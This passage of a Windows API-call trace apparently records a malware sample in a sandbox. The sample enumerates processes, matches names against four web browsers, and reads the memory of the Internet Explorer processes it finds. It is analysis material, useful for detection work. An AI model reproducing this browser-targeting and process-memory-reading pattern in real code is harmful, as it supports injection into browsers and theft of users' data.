	[0213.743] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.743] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.744] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0213.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x417c
	[0213.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.745] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0213.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.745] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.746] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0213.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.746] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.746] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0213.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4180
	[0213.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.748] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0213.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.748] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.749] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0213.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.749] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.749] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0213.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4184
	[0213.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.750] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.751] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.751] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.751] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.751] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0213.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4188
	[0213.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.752] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0213.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.753] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.753] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0213.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.753] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.754] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0213.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0213.754] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0213.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x418c
	[0213.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.755] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0213.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.756] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.757] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0213.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.757] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.758] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0213.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4190
	[0213.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.758] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0213.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.759] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.759] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0213.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.759] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.759] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0213.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4194
	[0213.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.760] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0213.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.761] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.761] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0213.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.761] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.761] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0213.762] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4198
	[0213.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.762] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0213.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.762] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.763] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0213.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.763] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.763] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0213.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x419c
	[0213.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.764] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0213.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.765] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.765] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0213.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.766] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.766] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0213.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x41a0
	[0213.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.767] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0213.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.767] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.767] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0213.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.768] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.768] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0213.769] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x41a4
	[0213.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.769] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0213.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.769] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.770] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0213.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.770] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.770] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0213.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x41a8
	[0213.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.771] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0213.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.772] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.772] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0213.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.772] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.773] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0213.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x41ac
	[0213.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.774] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0213.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.774] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.774] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0213.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.774] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.775] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0213.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x41b0
	[0213.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.775] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0213.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.776] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.776] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0213.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.776] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.776] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0213.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x41b4
	[0213.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.777] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0213.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.778] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.778] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0213.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.779] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.779] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0213.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x41b8
	[0213.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.780] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0213.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.780] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.781] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0213.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.781] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.782] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0213.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x41bc
	[0213.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.783] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0213.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.784] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.784] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0213.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.785] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.785] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0213.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x41c0
	[0213.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.786] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0213.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.787] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.787] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0213.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.788] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.788] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0213.789] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x41c4
	[0213.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.789] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0213.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.790] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.790] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0213.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.791] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.791] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0213.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x41c8
	[0213.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.792] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0213.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.792] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0213.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.792] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0213.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.793] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.793] NtQueryInformationProcess (in: ProcessHandle=0x41c8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0213.793] ReadProcessMemory (in: hProcess=0x41c8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0213.793] ReadProcessMemory (in: hProcess=0x41c8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0213.793] ReadProcessMemory (in: hProcess=0x41c8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0213.793] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0213.793] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0213.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x41cc
	[0213.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.794] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0213.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.794] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0213.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0213.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.795] NtQueryInformationProcess (in: ProcessHandle=0x41cc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0213.795] ReadProcessMemory (in: hProcess=0x41cc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0213.795] ReadProcessMemory (in: hProcess=0x41cc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0213.795] ReadProcessMemory (in: hProcess=0x41cc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0213.796] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0213.796] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0213.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x41d0
	[0213.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.797] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0213.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.797] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.797] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0213.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.797] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
